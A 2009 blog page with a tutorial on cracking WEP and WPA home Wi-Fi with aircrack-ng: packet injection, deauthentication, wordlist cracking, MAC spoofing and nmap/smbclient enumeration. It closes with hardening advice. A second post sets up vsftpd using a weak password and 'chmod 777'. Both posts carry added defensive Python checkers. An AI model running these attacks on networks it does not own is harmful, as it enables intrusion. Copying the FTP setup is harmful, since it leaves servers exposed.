Sunday, October 25, 2009
How to protect your wireless home network
To understand that, we will first learn how to actually break them ;-)
It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.
I will use Ubuntu (Gnome desktop) under the root account with some non-default tools:
apt-get install nmap macchanger
You will need to install aircrack-ng and the adapter drivers from source to get the latest version.
I got an Edimax EW-7318USg for ~$30, one of the recommended devices.
Shortcuts I will use with the aircrack-ng suite:
AP-MAC - MAC address of the access point (AP)
AP-CH - channel the AP is working on, ex: 11
AP-NAM - wireless network name, ex: teddy
MY-MAC - MAC address of your adapter, ex: 001f1f3676fc
CL-MAC - MAC address of a client already associated with the AP (needed for the deauth attack), ex: 012345abcdef
The interface I will use is rausb0.
Simple WEP Crack
Put the card to monitor mode
airmon-ng stop rausb0
airmon-ng start rausb0
And let's start scanning
airodump-ng rausb0
Pick the target network and check whether we can inject packets
aireplay-ng -9 -e AP-NAM -a AP-MAC rausb0
Test on all bitrates
aireplay-ng -9 -e AP-NAM -a AP-MAC -B rausb0
Start capturing IVs for the target network to files
airodump-ng -c AP-CH --bssid AP-MAC -w output rausb0
Fake authentication with the access point, otherwise it will reject our packets
aireplay-ng -1 0 -e AP-NAM -a AP-MAC -h MY-MAC rausb0
aireplay-ng -1 6000 -o 1 -q 10 -e AP-NAM -a AP-MAC -h MY-MAC rausb0
Start aireplay in ARP request replay mode
aireplay-ng -3 -b AP-MAC -h MY-MAC rausb0
Or replay packets from a wireless client
aireplay-ng -2 -a AP-MAC -d ffffffffffff -m 68 -n 68 -t 1 -f 0 rausb0
Or make the access point rebroadcast the packet
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
ARP packets are typically either 68 (from a wireless client) or 86 (from a wired client) bytes
aireplay-ng -2 -p 0841 -m 68 -n 86 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
Or aireplay can be used to replay packets from a pcap file
aireplay-ng -2 -p 0841 -b AP-MAC -h MY-MAC -r replay_src-0303-124624.cap rausb0
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC -r some-capture.cap rausb0
Or use ready-to-send packet
aireplay-ng -2 -r arp-request rausb0
Once you have collected 40K to 80K data packets, you can try to crack the password
aircrack-ng -b AP-MAC output*.cap (PTW method, the default in aircrack-ng 1.0)
aircrack-ng -K -b AP-MAC output*.cap (FMS/KoreK method; -K selects it in aircrack-ng 1.0)
When no wireless clients exist
Fragmentation attack to obtain PRGA
aireplay-ng -5 -b AP-MAC -h MY-MAC rausb0
Chopchop attack to obtain PRGA
aireplay-ng -4 -b AP-MAC -h MY-MAC rausb0
You will get some "fragment-0203-180343.xor" file for the next step.
Use packetforge-ng to create an ARP packet
packetforge-ng -0 -a AP-MAC -h MY-MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request
You can inspect the created packet
tcpdump -n -vvv -e -s0 -r arp-request
Since you are testing against your own AP (you are, right?), decrypt the packet with your WEP key and make sure it is correct
airdecap-ng -e AP-NAM -w <your WEP key in hex> arp-request
View the decrypted packet
tcpdump -n -r arp-request-dec
How to Crack WPA/WPA2
The only way is to capture the 4-way authentication handshake
Deauthenticate a connected client once
aireplay-ng -0 1 -a AP-MAC -c CL-MAC rausb0
or 3 times (to be sure ;-)
aireplay-ng -0 10 -a AP-MAC -c CL-MAC rausb0
For cracking, you will need good wordlists
aircrack-ng -w password.lst,another.lst -b AP-MAC wpa*.cap
Other useful stuff
MAC address change - manual way
ifdown rausb0
ifconfig rausb0 hw ether 00:11:22:33:44:55
ifup rausb0
But better with
macchanger --mac 00:11:22:33:44:55
Set bitrate
iwconfig rausb0 rate 54M
iwconfig rausb0 rate 11M
Scan network for devices
nmap -sP 10.0.0.1-255
Scan services on a specific device (the second form skips host discovery)
nmap 10.0.0.16
nmap -PN 10.0.0.16
Windows information and shares (if open)
smbclient -L 10.0.0.16
smbclient -L 10.0.0.16 -U Guest -W workgroup
Kernel modules control
lsmod | grep 73
modprobe rt73
Trace packets with
tcpdump -n -vvv -s0 -e -i rausb0 | grep -i -E "(RA:|Authentication|ssoc)"
Gnome NetworkManager (it is sometimes better to stop it during attacks)
/etc/init.d/NetworkManager start|stop|restart
nm-tool --list
tail -f /var/log/daemon.log | grep NetworkManager
Links
aircrack-ng tutorials and FAQ
Latest nmap
So, to protect your wireless network: don't use WEP; use WPA/WPA2 with a long and complicated password; MAC filtering will only delay an attacker for a while (until he sees the MAC of one of the authenticated clients); hiding the SSID doesn't help at all.
UPD: Good news from the aircrack team:
updated Slitaz aircrack distribution (Aircrack-ng 1.0 final including sqlite airolib-ng support, patched drivers, etc)
WPA Cracker - cloud cracking service
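The WPA/WPA2 advice above ("long and complicated password") can be made concrete. The wordlist attack, whether run locally with aircrack-ng or on a cloud service, has to derive one PMK per candidate, and a PMK is PBKDF2-HMAC-SHA1 over the passphrase and SSID with 4096 iterations as IEEE 802.11i specifies, so the attacker's cost is the number of candidates times that fixed work. The Python below is an added example, not code from the post or from the aircrack-ng project: it derives the PMK exactly as a supplicant does, measures this machine's single-threaded guess rate, and classifies a passphrase against a constructed sample wordlist and an assumed attacker budget of one million guesses per second (the budget, the sample wordlist and the one-year horizon are assumptions, not figures from the post).

```python
"""Added example (not from the post): does a WPA/WPA2-PSK passphrase survive
the wordlist attack described above?

Cost for the attacker = (candidates to try) x (one PBKDF2-HMAC-SHA1 run of 4096
iterations, the PMK derivation from IEEE 802.11i). A dictionary is small, a
random 16-character passphrase is not.
"""
import hashlib
import string
import time

SECONDS_PER_YEAR = 365 * 24 * 3600


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """256-bit PMK (the PSK) exactly as a supplicant, or a cracker, computes it."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def local_guess_rate(ssid: str, seconds: float = 0.3) -> float:
    """PMK derivations per second on this machine, single-threaded: a rough
    floor for a cracker (GPU rigs and cloud services do far better)."""
    count, start = 0, time.perf_counter()
    while time.perf_counter() - start < seconds:
        wpa2_pmk(f"candidate{count}", ssid)
        count += 1
    return count / (time.perf_counter() - start)


def keyspace(passphrase: str) -> int:
    """Candidates a brute-force search must cover if the passphrase had been
    drawn uniformly from the character classes it actually uses."""
    classes = (string.ascii_lowercase, string.ascii_uppercase,
               string.digits, string.punctuation)
    alphabet = sum(len(c) for c in classes if any(ch in c for ch in passphrase))
    return alphabet ** len(passphrase)


def assess(passphrase: str, wordlist, guesses_per_second: float,
           horizon_years: float = 1.0) -> str:
    """'invalid' (not a legal WPA passphrase), 'wordlist' (plain dictionary hit),
    'brute-forceable' (keyspace exhausted within horizon_years at the given
    rate) or 'ok'."""
    if not 8 <= len(passphrase) <= 63 or not passphrase.isascii():
        return "invalid"  # 802.11i passphrases are 8..63 ASCII characters
    if passphrase in wordlist:
        return "wordlist"
    years = keyspace(passphrase) / guesses_per_second / SECONDS_PER_YEAR
    return "brute-forceable" if years < horizon_years else "ok"


# Constructed stand-in for password.lst from the post; real lists hold millions.
SAMPLE_WORDLIST = {"password", "teddy", "12345678", "qwertyui"}

if __name__ == "__main__":
    rate = local_guess_rate("teddy")
    print(f"this machine: {rate:,.0f} PMK derivations/s single-threaded")
    assumed_attacker = 1_000_000.0  # assumption: a GPU-backed cracker's budget
    for p in ("teddy", "password", "abcdefgh", "Xq7!vR2#pL9@wZ4b"):
        print(f"{p!r:20} -> {assess(p, SAMPLE_WORDLIST, assumed_attacker)}")
```

The SSID is the PBKDF2 salt, so a unique SSID only stops precomputed tables (the airolib-ng idea mentioned in the update); it does nothing against a guess that is actually in the wordlist. Only the passphrase's size of keyspace does.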
Sunday, October 11, 2009
Tuesday, October 6, 2009
VSFTPD and virtual user
I will show you how to install an FTP server on RedHat Linux and create a virtual user "upload" with password "kuku" for uploading and downloading files.
First, you need to run
[alexey@blogger ~]$ sudo yum install vsftpd
I got version 2.0.1
[alexey@blogger ~]$ vsftpd -v
vsftpd: version 2.0.1
Then let's back up the original config
[alexey@blogger ~]$ sudo cp /etc/vsftpd/vsftpd.conf /etc/vsftpd/vsftpd.conf.default
Now we can edit the config for our needs; open vi
[alexey@blogger ~]$ sudo vi /etc/vsftpd/vsftpd.conf
and paste the following
listen=YES
anonymous_enable=NO
local_enable=YES
virtual_use_local_privs=YES
write_enable=YES
connect_from_port_20=YES
secure_chroot_dir=/usr/share/empty
pam_service_name=vsftpd
guest_enable=YES
guest_username=www
local_root=/path/to/ftp-directory
chroot_local_user=YES
hide_ids=YES
dirmessage_enable=NO
tcp_wrappers=YES
check_shell=NO
userlist_enable=YES
anon_umask=0644
ftpd_banner=Welcome to my FTP!
Now we should create the virtual users' authentication file; you can use Apache's tools.
'-c' creates a new file (remove it when adding new users), '-b' will take the password from the command line
[alexey@blogger ~]$ /usr/local/httpd/bin/htpasswd -cb /path/to/ftp/users upload kuku
Adding password for user default
Now we need to tell vsftpd how it should check users; it will use PAM as described in /etc/pam.d/vsftpd
[alexey@blogger ~]$ cat /etc/pam.d/vsftpd
#%PAM-1.0
auth required pam_listfile.so item=user sense=deny file=/etc/vsftpd.ftpusers onerr=succeed
auth required pam_stack.so service=system-auth
auth required pam_shells.so
account required pam_stack.so service=system-auth
session required pam_stack.so service=system-auth
Back it up with
[alexey@blogger ~]$ sudo cp /etc/pam.d/vsftpd /etc/pam.d/vsftpd.default
and paste the following
[alexey@blogger ~]$ cat /etc/pam.d/vsftpd
# MaggaPlus access
auth required pam_pwdfile.so pwdfile /path/to/ftp/users
account required pam_permit.so
[alexey@blogger ~]$
At this point you can start the daemon with
[alexey@blogger ~]$ sudo /etc/init.d/vsftpd start
and if everything is ok, try to connect to your new FTP.
I was dealing with a problem: even when I used the username and password pair I had just created, it always returned "Invalid login". I thought that the problem was in the users file and I rewrote it many times. But it was just the pwdfile module missing, which I got from
[alexey@blogger ~]$ sudo tail /var/log/messages
Oct 5 20:21:57 blogger vsftpd: vsftpd vsftpd succeeded
Oct 5 20:21:59 blogger vsftpd[27288]: PAM unable to dlopen(/lib/security/pam_pwdfile.so)
Oct 5 20:21:59 blogger vsftpd[27288]: PAM [dlerror: /lib/security/pam_pwdfile.so: cannot open shared object file: No such file
Oct 5 20:21:59 blogger vsftpd[27288]: PAM adding faulty module: /lib/security/pam_pwdfile.so
All PAM plugins are placed in /lib/security/
[alexey@blogger ~]$ ll /lib/security/
total 1884
-rwxr-xr-x 1 root root 15560 May 12 2006 pam_access.so
-rwxr-xr-x 1 root root 52334 Oct 13 2004 pam_ccreds.so
-rwxr-xr-x 1 root root 6004 May 12 2006 pam_chroot.so
...
And pam_pwdfile.so was missing :-(
I found it and installed it
[alexey@blogger ~]$ sudo rpm -i pam-pam_pwdfile-0.99-2.i586.rpm
warning: pam-pam_pwdfile-0.99-2.i586.rpm: V3 DSA signature: NOKEY, key ID 1bbd5459
[alexey@blogger ~]$ ll /lib/security/pam_pwdfile.so
-rwxr-xr-x 1 root root 14572 Jul 30 2004 /lib/security/pam_pwdfile.so
Now it is fine, and FTP auth worked!
Make sure that the FTP root is readable and writable for the specified user
[alexey@blogger ~]$ chmod 777 -R /path/to/ftp-directory
[alexey@blogger ~]$ ftp localhost
Connected to localhost (127.0.0.1).
220 Welcome to my FTP!
Name (blogger:alexey): upload
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> close
221 Goodbye.
ftp> bye
[alexey@blogger ~]$
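Both things that went wrong here can be checked before the first login attempt: the PAM stack names a module that is not installed (the "PAM unable to dlopen" lines), and some vsftpd.conf values are easy to misread (a umask is subtracted from 0666, it is not a permission mode, so anon_umask=0644 would produce files nobody can read if it ever applied; with virtual_use_local_privs=YES it does not apply, local_umask does). The Python below is an added example, not code from the post or from the vsftpd project. The PAM stack, syslog lines and config it embeds are copied from the post as constructed samples, WEAK_CONF is a constructed counter-example, and the defaults it assumes (anonymous_enable=YES, local_umask and anon_umask 077) are the ones documented in the vsftpd man page.

```python
"""Added example (not from the post): pre-flight checks for a vsftpd
virtual-user setup, i.e. a PAM stack loading modules that are not installed,
and vsftpd.conf settings worth a second look."""
import os
import re

# Constructed sample: the final /etc/pam.d/vsftpd from the post.
PAM_VSFTPD = """\
# MaggaPlus access
auth required pam_pwdfile.so pwdfile /path/to/ftp/users
account required pam_permit.so
"""

# Constructed sample: the /var/log/messages lines quoted in the post.
SYSLOG_SAMPLE = """\
Oct 5 20:21:57 blogger vsftpd: vsftpd vsftpd succeeded
Oct 5 20:21:59 blogger vsftpd[27288]: PAM unable to dlopen(/lib/security/pam_pwdfile.so)
Oct 5 20:21:59 blogger vsftpd[27288]: PAM adding faulty module: /lib/security/pam_pwdfile.so
"""

# Constructed sample: the relevant part of the post's vsftpd.conf.
VSFTPD_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
virtual_use_local_privs=YES
write_enable=YES
guest_enable=YES
guest_username=www
chroot_local_user=YES
anon_umask=0644
"""

# Constructed sample of a config you would not want on a reachable host.
WEAK_CONF = "anonymous_enable=YES\nwrite_enable=YES\nchroot_local_user=NO\n"


def pam_modules(pam_text):
    """Module file names a PAM config loads ('type control module [args]').
    Bracketed controls like '[success=1 default=ignore]' span several tokens;
    include/substack name another config, not a module, and are skipped."""
    mods = []
    for raw in pam_text.splitlines():
        tokens = raw.split("#", 1)[0].split()
        if len(tokens) < 3:
            continue
        end = 1                                    # index of last control token
        if tokens[1].startswith("["):
            while end < len(tokens) and not tokens[end].endswith("]"):
                end += 1
        if tokens[1] in ("include", "substack") or end + 1 >= len(tokens):
            continue
        mods.append(tokens[end + 1])
    return mods


def missing_pam_modules(pam_text, available):
    """Modules the config loads that are not among the `available` file names."""
    present = set(available)
    return [m for m in pam_modules(pam_text) if m not in present]


def modules_on_disk(dirs=("/lib/security", "/lib64/security")):
    """File names present in this host's PAM module directories."""
    found = set()
    for d in dirs:
        if os.path.isdir(d):
            found.update(os.listdir(d))
    return found


DLOPEN_RE = re.compile(r"PAM unable to dlopen\(([^)]+)\)")


def dlopen_failures(log_text):
    """Module paths PAM could not load, taken from syslog lines like the post's."""
    return sorted({m.group(1) for m in DLOPEN_RE.finditer(log_text)})


def parse_vsftpd_conf(text):
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip()
    return conf


def vsftpd_findings(conf):
    """(key, message) pairs for settings worth reviewing; defaults per vsftpd's man page."""
    def on(key, default):
        return conf.get(key, default).upper() == "YES"

    out = []
    if on("anonymous_enable", "YES"):            # compiled-in default is YES
        out.append(("anonymous", "anonymous_enable is on (the default); set NO unless intended"))
        if on("write_enable", "NO"):
            out.append(("anon_write", "write_enable=YES with anonymous access permits unauthenticated uploads"))
    if not on("chroot_local_user", "NO"):
        out.append(("no_chroot", "chroot_local_user=NO lets a logged-in user browse the whole filesystem"))
    for key in ("local_umask", "anon_umask"):    # a umask is a mask: files get 0666 & ~umask
        if key in conf:
            mode = 0o666 & ~int(conf[key], 8)
            if not mode & 0o400:
                out.append(("umask", f"{key}={conf[key]} gives new files mode {mode:04o}, unreadable by their owner"))
    if "anon_umask" in conf and on("guest_enable", "NO") and on("virtual_use_local_privs", "NO"):
        out.append(("umask_unused", "anon_umask is set, but virtual_use_local_privs=YES means local_umask (default 077) applies"))
    return out


if __name__ == "__main__":
    for path in dlopen_failures(SYSLOG_SAMPLE):
        print("syslog reports PAM could not load", path)
    for mod in missing_pam_modules(PAM_VSFTPD, modules_on_disk()):
        print("config references", mod, "but it is not installed on this host")
    for key, msg in vsftpd_findings(parse_vsftpd_conf(VSFTPD_CONF)):
        print(f"[{key}] {msg}")
```

Run it on the server after editing /etc/pam.d/vsftpd: a module reported by missing_pam_modules is exactly the condition that produced the "Invalid login" seen in the post, and catching it from the config file is faster than waiting for the dlopen error in /var/log/messages.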
Information used